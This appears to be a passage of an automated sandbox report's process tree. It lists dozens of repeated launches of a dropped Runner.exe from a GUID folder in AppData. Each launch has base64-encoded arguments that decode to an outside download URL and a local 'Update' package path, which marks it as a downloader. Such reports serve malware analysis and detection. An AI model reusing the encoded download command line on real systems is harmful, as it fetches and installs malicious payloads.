    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1796
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2988
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1684
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1716
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2100
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1696
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2096
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1536
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2572
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2568
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2708
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2628
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2536
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1280
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2816
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2064
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1808
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1216
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1852
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1084
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2068
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2036
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2108
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1984
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1152
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1672
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1484
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2944
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:972
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1988
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2320
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2020
